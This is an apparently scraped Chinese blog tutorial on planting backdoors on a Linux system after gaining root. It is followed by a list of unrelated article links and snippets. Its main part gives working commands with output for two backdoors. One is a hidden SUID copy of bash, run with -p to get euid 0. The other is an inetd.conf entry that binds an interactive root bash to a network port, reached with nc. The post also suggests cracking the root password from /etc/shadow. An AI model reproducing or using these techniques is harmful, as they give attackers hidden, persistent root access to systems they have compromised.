前提: 
你现在已经是root用户, 想留一个后门以便日后再一次进入。

系统环境: 

1 dawg:~# uname -a
2 Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1. SUID shell

关于SUID位的知识,请点这里
首先, 先切换成为root用户,并执行以下的命令:

1 dawg:~# cp /bin/bash /.woot
2 dawg:~# chmod 4755 /.woot
3 dawg:~# ls -al /.woot
4 -rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) .

现在,做为一个普通用户,我们来启用这个后门:

1 fw@dawg:~$ id
2 uid=1000(fw) gid=1000(fw) groups=1000(fw)
3 fw@dawg:~$ /.woot
4 .woot-2.05b$ id
5 uid=1000(fw) gid=1000(fw) groups=1000(fw)
6 .woot-2.05b$

法克!为什么不行呢?

因为 bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

1 .woot-2.05b$ /.woot -p
2 .woot-2.05b# id
3 uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

使用-p参数来获取一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,可以戳这里

这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径

小知识:
如何查找那些具有 SUID 的文件:

1 dawg:~# find / -perm +4000 -ls

这时就会返回具有SUID位的文件啦。

2. 远程后门:利用 /etc/inetd.conf

我们使用vi来修改 /etc/inetd.conf 文件

原文件:

1 #chargen dgram udp wait root internal
2 #discard stream tcp nowait root internal
3 #discard dgram udp wait root internal
4 #daytime stream tcp nowait root internal

修改为:

1 #discard stream tcp nowait root internal
2 #discard dgram udp wait root internal
3 daytime stream tcp nowait root /bin/bash bash -i

开启inetd:

1 dawg:~#  inetd

如果要强制重启inetd:

1 dawg:~# ps -ef | grep inetd
2 root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd
3 root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd
4 dawg:~# kill -HUP 362

现在我们就可以用nc来搞定:

01 C:tools<nc -vv 192.168.1.77 13
02 192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA
03 (UNKNOWN) [192.168.1.77] 13 (daytime) open
04  
05 bash: no job control in this shell
06 bash-2.05b# bash-2.05b#
07 bash-2.05b# id
08 uid=0(root) gid=0(root) groups=0(root)
09 bash-2.05b# uname -a
10 Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

小贴士:

我们来一招更厉害的:

我们可以修改/etc/services文件,加入以下的东西:

1 woot 6666/tcp  #evil backdoor service

然后修改/etc/inetd.conf  :

1 woot stream tcp nowait root /bin/bash bash -i

我们可以修改成一些常见的端口,以实现隐藏。

其实 /etc/shadow文件,爆破root的密码才最保险啊!

LINUX的两种后门总结(suid shell与inetd)的更多相关文章

  1. linux 的 两种磁盘扩容

    当LVM分区空间不足的时候,可以进行扩容.主要的扩容方法有两种: 通过空余的磁盘进行扩容,这个方法比较简单,不会对原有数据有影响.将其他LVM分区空间取出一部分给需要扩容的LVM分区.下面就分别具体介 ...

  2. Linux上两种网络连接方式

    模式一:NAT方式好处:路由器更换,或者交换机更换,网络仍然可以使用,所用使用最多 准备工作: 查看VMware服务器启动情况,五个全开模式 vmnet8开启模式 1 配置VMware交换机的ip地址 ...

  3. [ 总结 ] Linux下两种常用的双网卡绑定

    1. mode=0 (round-robin) 链路聚合:将两个或者更多数据信道结合成一个单一的信道,该信道以一个更高带宽的逻辑链路出现,链路聚合一般用来连接一个或多个带宽需求量大的设备,链路聚合是指 ...

  4. 两种“新型”的javaweb后门(jspx和Java Logger)

    利用这个可以突破st2下   强制jsp跳转login.jsp 利用jspx解决jsp后缀被限制拿shell - Hack Blog | 黑客博客http://www.hackblog.cn/post ...

  5. Linux下安装mysql(yum和源码编译两种方式)

    这里介绍Linux下两种安装mysql的方式:yum安装和源码编译安装. 1. yum安装 (1)首先查看centos自带的mysql是否被安装: # yum list installed |grep ...

  6. Linux系统中存储设备的两种表示方法

    转:https://blog.csdn.net/holybin/article/details/38637381 一.对于IDE接口的硬盘的两种表示方法: 1.IDE接口硬盘,对于整块硬盘的两种表示方 ...

  7. Linux中的两种守护进程stand alone和xinetd

    Linux中的两种守护进程stand alone和xinetd --http://www.cnblogs.com/itech/archive/2010/12/27/1914846.html#top 一 ...

  8. Linux安装MySQL的两种方法

    转载:http://blog.csdn.net/superchanon/article/details/8546254/ 1.       运行平台:CentOS 6.3 x86_64,基本等同于RH ...

  9. 云服务器 ECS Linux 服务器修改时区的两种方式

    在云服务器 ECS Linux 系统中,以 Centos6.5 为例,可以通过如下两种方式,修改系统时区: 可以使用命令 tzselect,修改时区.操作示例: [root@localhost ~]# ...

随机推荐

  1. 让Java说话-用Java实现语音引擎

    让Java说话-用Java实现语音引擎 2005-11-07 10:04:09 分类: Java技术 为应用程序加上语音能力有什么好处呢?粗略地讲,是为了趣味,它适合所有注重趣味的应用,比如游戏.当然 ...

  2. 我最优惠网系列(1)——HTML 解析类库HtmlAgilityPack

    0. 序言 在开发我最优惠网的过程中,遇到一些问题和技术点,写出来和大家分享,也是我自己对近期工作的整理和记录,预计会有解析HTML类库.本地缓存.链接跳转和C#中执行js代码技巧等方面. 1. Ht ...

  3. 第二章 OO大原则

    昨天忙了一天,晚上加班到了12点,虽然工作有时候比较累,但是整体来讲还是比较轻松的,国企加上我是今年才毕业的应届生,导致了现在这种情况.工资也真的不算高...但我觉得最开始还是要踏踏实实一点比较好.学 ...

  4. jdbc基础 (四) 批处理

    批处理,就是字面上的意思,一次性处理一批sql语句. 直接看例子吧: package com.cream.ice.jdbc; import java.sql.Connection; import ja ...

  5. 第十六课:一些奇葩的元素节点object,video

    object元素 object这个元素,现在前端很少用到,但是像flash,svg等奇葩元素,必须嵌套在object对象元素中.现代浏览器用video,canvas代替这些元素. 之前做过图表和地图的 ...

  6. [设计模式] Javascript 之 外观模式

    外观模式说明 说明:外观模式是用于由于子系统或程序组成较复杂而提供的一个高层界面接口,使用客户端更容易访问底层的程序或系统接口; 外观模式是我们经常使用遇到的模式,我们经常涉及到的功能,可能需要涉及到 ...

  7. python 读写文件和设置文件的字符编码

    一. python打开文件代码如下: f = open("d:\test.txt", "w") 说明:第一个参数是文件名称,包括路径:第二个参数是打开的模式mo ...

  8. Linux 下SVN服务器搭建

    系统环境        RHEL5.4最小化安装(关iptables,关selinux) + ssh + yum 一,安装必须的软件包.  yum install subversion (SVN服务器 ...

  9. .net 使用PowerShell获取电脑中的UUID

    UUID含义是通用唯一识别码 (Universally Unique Identifier),这 是一个软件建构的标准,也是被开源软件基金会 (Open Software Foundation, OS ...

  10. C语言结构体的初始化

    今天在工作时,看到了奇葩的结构体初始化方式,于是我查了一下C99标准文档和gcc的说明文档,终于搞清楚是怎么回事了. 假设有如下结构体定义: typedef struct { int a, b, c; ...